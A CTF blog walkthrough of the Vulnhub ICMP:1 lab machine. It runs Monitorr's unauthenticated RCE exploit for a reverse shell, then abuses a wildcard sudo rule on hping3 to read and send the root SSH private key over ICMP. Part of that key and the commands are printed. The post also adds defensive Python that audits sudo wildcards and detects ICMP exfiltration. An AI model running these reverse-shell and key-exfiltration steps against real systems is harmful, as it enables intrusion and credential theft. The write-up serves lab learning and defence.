Windy's little blog

All the odds and ends of everyday life, and I like CTF.

Vulnhub ICMP: 1 Walkthrough

https://www.vulnhub.com/entry/icmp-1,633/


Scan ports, find 22 and 80.

┌──(kali㉿mykali)-[~/Documents/icmp]
└─$ nmap -sV -sC -p- 192.168.56.81  -oN ports.log
...
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))


Scan port 80.

┌──(kali㉿mykali)-[~/Documents/icmp]
└─$ gobuster dir -u http://192.168.56.81  -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt -b 400,403,404,500 --wildcard
/index.php (Status: 302)
/mon (Status: 301)

Open port 80 in Firefox: it is a system monitoring program named "Monitorr". Searchsploit shows it may have known vulnerabilities.

┌──(kali㉿mykali)-[~/Documents/icmp]
└─$ searchsploit monitorr           
----------------------------------------------------- ---------------------------------
 Exploit Title                        |  Path
----------------------------------------------------- ---------------------------------
Monitorr 1.7.6m - Authorization Bypass        | php/webapps/48981.py
Monitorr 1.7.6m - Remote Code Execution (Unauthentic | php/webapps/48980.py
----------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results


Use 48980.py to get a reverse shell.

┌──(kali㉿mykali)-[~/Documents/icmp]
└─$ python3 48980.py http://192.168.56.81/mon 192.168.56.150 1234
------------------------------------------------------------------------------
┌──(kali㉿mykali)-[~/Documents/icmp]
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.56.150] from (UNKNOWN) [192.168.56.81] 44222
bash: cannot set terminal process group (498): Inappropriate ioctl for device
bash: no job control in this shell
www-data@icmp:/var/www/html/mon/assets/data/usrimg$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@icmp:/var/www/html/mon/assets/data/usrimg$

In fox's home folder there is a reminder text file and a "devel" folder whose contents we cannot list (it is execute-only for other users).

www-data@icmp:/home/fox$ cd /home/fox
cd /home/fox
www-data@icmp:/home/fox$ ls -la
ls -la
total 20
drwxr-xr-x 3 root root 4096 Dec  3 16:08 .
drwxr-xr-x 3 root root 4096 Dec  3 16:04 ..
lrwxrwxrwx 1 root root    9 Dec  3 16:08 .bash_history -> /dev/null
drwx--x--x 2 fox  fox  4096 Dec  3 16:05 devel
-rw-r--r-- 1 fox  fox    33 Dec  3 16:08 local.txt
-rw-r--r-- 1 root root   78 Dec  3 16:08 reminder
www-data@icmp:/home/fox$ cat reminder
cat reminder
crypt with crypt.php: done, it works
work on decrypt with crypt.php: howto?!?
www-data@icmp:/home/fox$

The note suggests there is a file named crypt.php in devel. Since the directory is execute-only, we cannot list it, but we can still read a file inside it by name.

www-data@icmp:/home/fox$ ls -la devel/crypt.php
ls -la devel/crypt.php
-rw-r--r-- 1 fox fox 56 Dec  3 16:05 devel/crypt.php
www-data@icmp:/home/fox$ cat devel/crypt.php
cat devel/crypt.php
<?php
echo crypt('.............','da');
?>


Now we can try to log in over SSH as fox with the password from crypt.php. Then check sudo.

┌──(kali㉿mykali)-[~/Documents/icmp]
└─$ ssh fox@192.168.56.81
fox@192.168.56.81's password: 
Linux icmp 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64
...
Last login: Fri Mar 12 05:43:09 2021 from 192.168.56.150
$ sudo -l
[sudo] password for fox: 
Matching Defaults entries for fox on icmp:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fox may run the following commands on icmp:
    (root) /usr/sbin/hping3 --icmp *
    (root) /usr/bin/killall hping3
$

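The sudo rule above is the whole privilege-escalation story: `/usr/sbin/hping3 --icmp *` pins only the first option, so any further hping3 option is accepted and runs as root. The following is an added example, not part of the original walkthrough and not code from the sudo or hping3 projects. It parses `sudo -l` output (the sample text is the output shown above, embedded as a constant) and flags rules whose argument list is empty or contains a wildcard, which is the check a defender would run across hosts before an attacker finds the rule.

```python
import re

# Constructed sample: the "sudo -l" output for fox shown above, pasted as text.
SAMPLE_SUDO_L = """\
Matching Defaults entries for fox on icmp:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin
User fox may run the following commands on icmp:
    (root) /usr/sbin/hping3 --icmp *
    (root) /usr/bin/killall hping3
"""

# One "(runas) [TAG: ...] /path/cmd [args]" line from the command section of sudo -l.
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s+(?:[A-Z]+:\s*)*(\S+)(?:\s+(.*))?$")


def parse_sudo_rules(text):
    """Parse the command section of `sudo -l` output into rule dicts."""
    rules = []
    in_commands = False
    for line in text.splitlines():
        # Everything before this header is Defaults; rules come after it.
        if line.startswith("User ") and "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append({
                "runas": m.group(1).strip(),
                "command": m.group(2),
                "args": (m.group(3) or "").strip(),
            })
    return rules


def assess_rule(rule):
    """Return the reasons a rule is risky; an empty list means no finding."""
    risks = []
    args = rule["args"]
    if args == "":
        # In sudoers a command with no argument list accepts any arguments.
        risks.append("no argument list: caller may pass any options")
    elif "*" in args:
        # A wildcard only pins the options before it; anything may follow,
        # e.g. hping3's --file, which reads a file as the runas user.
        risks.append("wildcard in arguments: caller may append arbitrary options")
    runas_user = rule["runas"].split(":")[0].strip()
    if risks and runas_user in ("root", "ALL"):
        risks.append("runs as root, so whatever the options allow happens with root privileges")
    return risks


def audit_sudo_l(text):
    """Map each risky command line to its list of reasons."""
    findings = {}
    for rule in parse_sudo_rules(text):
        reasons = assess_rule(rule)
        if reasons:
            key = rule["command"] + (" " + rule["args"] if rule["args"] else "")
            findings[key] = reasons
    return findings


if __name__ == "__main__":
    for cmd, reasons in audit_sudo_l(SAMPLE_SUDO_L).items():
        print(cmd)
        for reason in reasons:
            print("  -", reason)
```

The `killall hping3` rule produces no finding because its argument list is exact. The remediation the audit points at is to replace the wildcard with the exact argument sets the user needs, or to put the intended invocation in a root-owned wrapper script and grant sudo on that script instead.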

Because the sudo rule ends in a wildcard, any further hping3 option is allowed, including --file, which reads a file as root and puts its contents into the ICMP payloads. We need two terminals on the victim machine: one sends and one receives.

Here is the first (sending) terminal. Press Ctrl+C once the second terminal has received all of the private key data.

fox@icmp:~$ sudo hping3 --icmp 127.0.0.1 -d 100 --sign signature --file /root/.ssh/id_rsa  
HPING 127.0.0.1 (lo 127.0.0.1): icmp mode set, 28 headers + 100 data bytes
[main] memlockall(): Success
Warning: can't disable memory paging!
len=128 ip=127.0.0.1 ttl=64 id=5102 icmp_seq=0 rtt=6.6 ms
...
len=128 ip=127.0.0.1 ttl=64 id=8754 icmp_seq=30 rtt=2.6 ms
^C
--- 127.0.0.1 hping statistic ---
31 packets transmitted, 31 packets received, 0% packet loss
round-trip min/avg/max = 0.6/4.8/8.1 ms

Here is the second (receiving) terminal.

fox@icmp:~$ sudo hping3 --icmp 127.0.0.1 --listen signature --safe  
Warning: Unable to guess the output interface
hping3 listen mode
[main] memlockall(): Success
Warning: can't disable memory paging!
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAqcCz/pKzjVNZi9zdKJDkvhMhY8lOb2Qth8e/3bLJ/ssgmRLoJXAQ
...
qEx5FmhFueiELGZjVJiEPAWbbsFRdskr4eYfhJ+bz91G5aJXpIJqsNw829TOXf/3439Rix
q/qSihL6WLsu0AAAAQcm9vdEBjYWxpcGVuZHVsYQECAw==
-----END OPENSSH PRIVATE KEY-----

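From the defender's side, the two terminals above leave a clear signature on the wire: ICMP echo payloads larger than a normal ping, carrying a fixed marker string and PEM armour lines. The following is an added example, not part of the original walkthrough and not code from hping3. It assumes the ICMP echo data has already been pulled out of a capture as byte strings (no pcap parsing is included) and that, as in hping3's listen mode, the marker string leads each chunk and the file data follows it; the sample payloads are constructed to that layout from the key fragments shown above.

```python
import re

# Constructed sample ICMP echo payloads mimicking hping3 --sign: the signature
# followed by a slice of the file. One ordinary ping payload (no signature, 56
# bytes of pattern data) is mixed in so the filter has something to ignore.
SIGNATURE = b"signature"
SAMPLE_PAYLOADS = [
    SIGNATURE + b"-----BEGIN OPENSSH PRIVATE KEY-----\n",
    SIGNATURE + b"b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\n",
    bytes(range(0x10, 0x48)),  # 56 bytes, like a default Linux ping
    SIGNATURE + b"-----END OPENSSH PRIVATE KEY-----\n",
]

# Default ICMP echo data size sent by Linux ping; larger echoes deserve a look.
NORMAL_PING_DATA_LEN = 56

# PEM armour lines as found in private keys and certificates.
PEM_MARKER_RE = re.compile(rb"-----(BEGIN|END) [A-Z ]+-----")


def extract_signed_data(payloads, signature):
    """Reassemble the bytes that follow `signature` in each payload, in arrival order.

    This mirrors what hping3's listen mode prints and tells an analyst exactly
    what left the host.
    """
    chunks = []
    for payload in payloads:
        idx = payload.find(signature)
        if idx != -1:
            chunks.append(payload[idx + len(signature):])
    return b"".join(chunks)


def audit_icmp_payloads(payloads, signature=None):
    """Return (index, reason) findings for suspicious ICMP echo payloads.

    `signature` is optional: a known marker can be matched directly, but the
    size and PEM checks work without knowing it.
    """
    findings = []
    for i, payload in enumerate(payloads):
        if len(payload) > NORMAL_PING_DATA_LEN:
            findings.append((i, f"payload of {len(payload)} bytes exceeds the usual {NORMAL_PING_DATA_LEN}"))
        if PEM_MARKER_RE.search(payload):
            findings.append((i, "PEM armour marker in ICMP payload"))
        if signature is not None and signature in payload:
            findings.append((i, "hping3-style signature present"))
    return findings


if __name__ == "__main__":
    for idx, reason in audit_icmp_payloads(SAMPLE_PAYLOADS, SIGNATURE):
        print(f"payload {idx}: {reason}")
    print(extract_signed_data(SAMPLE_PAYLOADS, SIGNATURE).decode())
```

In a real capture the payload sizes and PEM markers are the checks to alert on, since the marker string is chosen by the sender and will not be known in advance; the reassembly step is for the investigation afterwards, to establish which file was exposed and needs rotating.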

Now we can SSH in as root with the recovered key.

┌──(kali㉿mykali)-[~/Documents/icmp]
└─$ ssh root@192.168.56.81 -i id_rsa
Linux icmp 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Mar 12 05:55:54 2021 from 192.168.56.150
root@icmp:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)
icmp

